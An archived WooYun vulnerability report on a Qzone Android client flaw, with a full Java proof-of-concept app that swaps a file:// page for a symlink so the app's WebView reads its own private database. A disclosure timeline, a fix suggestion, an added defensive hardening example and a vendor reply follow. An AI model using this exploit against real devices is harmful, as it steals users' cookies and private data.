WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2014-05-26: Details sent to the vendor and awaiting the vendor's handling
2014-05-26: Vendor confirmed; details disclosed to the vendor only
2014-05-29: Details opened to third-party security partners
2014-07-20: Details opened to core white hats and experts in related fields
2014-07-30: Details opened to regular white hats
2014-08-09: Details opened to intern white hats
2014-08-24: Details disclosed to the public
QQ空间 (Qzone) Android client: logic flaw leads to privacy leak
The QQ空间 Android client does not properly restrict symbolic links under the file: scheme, so cookies and other private user data can be stolen.
import android.net.Uri;
import android.os.Bundle;
import android.app.Activity;
import android.content.Intent;

public class MainActivity extends Activity {
    public final static String MY_PKG = "com.example.testqzone";
    public final static String MY_TMP_DIR = "/data/data/" + MY_PKG + "/tmp/";
    public final static String HTML_PATH = MY_TMP_DIR + "A" + Math.random() + ".html";
    public final static String TARGET_PKG = "com.qzone";
    public final static String TARGET_FILE_PATH = "/data/data/" + TARGET_PKG
            + "/databases/cfcd208495d565ef66e7dff9f98764da";
    // Page that waits, then re-reads its own URL (by then a symlink) via XMLHttpRequest
    public final static String HTML = "<body>"
            + "<u>Wait a few seconds.</u>"
            + "<script>"
            + "var d = document;"
            + "function doitjs() {"
            + "  var xhr = new XMLHttpRequest;"
            + "  xhr.onload = function() {"
            + "    var txt = xhr.responseText;"
            + "    d.body.appendChild(d.createTextNode(txt));"
            + "    alert(txt);"
            + "  };"
            + "  xhr.open('GET', d.URL);"
            + "  xhr.send(null);"
            + "}"
            + "setTimeout(doitjs, 8000);"
            + "</script>"
            + "</body>";

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        doit();
    }

    public void doit() {
        try {
            // Create the HTML page in a world-readable directory
            cmdexec("mkdir " + MY_TMP_DIR);
            cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);
            cmdexec("chmod -R 777 " + MY_TMP_DIR);
            Thread.sleep(1000);
            // Make the target app's WebView load the page over file://
            invokeChrome("file://" + HTML_PATH);
            Thread.sleep(4000);
            // Replace the HTML with a symlink to the target app's private database file
            cmdexec("rm " + HTML_PATH);
            cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH);
        } catch (Exception e) {
        }
    }

    // Sends an ACTION_VIEW intent to the target app's exported activity
    public void invokeChrome(String url) {
        Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url));
        intent.setClassName(TARGET_PKG, "com.tencent.mtt.spcialcall.SpecialCallActivity");
        startActivity(intent);
    }

    // Runs a shell command via /system/bin/sh -c
    public void cmdexec(String cmd) {
        try {
            String[] tmp = new String[] {"/system/bin/sh", "-c", cmd};
            Runtime.getRuntime().exec(tmp);
        } catch (Exception e) {
        }
    }
}
Restrict symbolic links.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-05-26 16:07
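A defensive counterpart to the fix suggested above, added here as an example and not part of the report or of QQ空间's own code: an Activity that accepts file:// intents only for regular, non-symlink files under its own files directory, and denies scripts on a file:// page any access to other file:// URLs (which is what defeats the delayed XMLHttpRequest in the PoC even if the file is swapped for a symlink after the path check). The class name and the single allowed directory are assumptions.

```java
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;
import java.io.File;
import java.io.IOException;

// Assumed class name; illustrative hardening, not QQ空间's code.
public class SafeFileViewActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView web = new WebView(this);
        WebSettings s = web.getSettings();
        // Script on a file:// page may not read other file:// URLs or reach other
        // origins; this holds even if the file is swapped after the check below.
        s.setAllowFileAccessFromFileURLs(false);
        s.setAllowUniversalAccessFromFileURLs(false);
        setContentView(web);

        Uri uri = getIntent().getData();
        // Assumption: only files under this app's own files directory are legitimate.
        if (uri == null || !isPlainFileUnder(uri, getFilesDir())) {
            finish();
            return;
        }
        web.loadUrl(uri.toString());
    }

    // True only if uri is file://, names a regular file that is not itself a
    // symlink, and resolves to a location under allowedDir.
    static boolean isPlainFileUnder(Uri uri, File allowedDir) {
        if (!"file".equals(uri.getScheme()) || uri.getPath() == null) return false;
        try {
            File f = new File(uri.getPath()).getAbsoluteFile();
            // Symlink test: canonical(parent) + name must equal canonical(f).
            // Comparing against the raw absolute path would misfire on /data/user/0.
            File parent = f.getParentFile();
            if (parent == null) return false;
            File resolvedSelf = new File(parent.getCanonicalFile(), f.getName());
            if (!resolvedSelf.getAbsolutePath().equals(f.getCanonicalPath())) return false;
            String root = allowedDir.getCanonicalPath() + File.separator;
            return f.getCanonicalPath().startsWith(root) && f.isFile();
        } catch (IOException e) {
            return false;
        }
    }
}
```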
Thank you very much for your report. We have begun handling the issue, and we thank everyone for their attention to the security of Tencent's services. If you have any questions, you are welcome to send feedback; a dedicated person will follow up.
None yet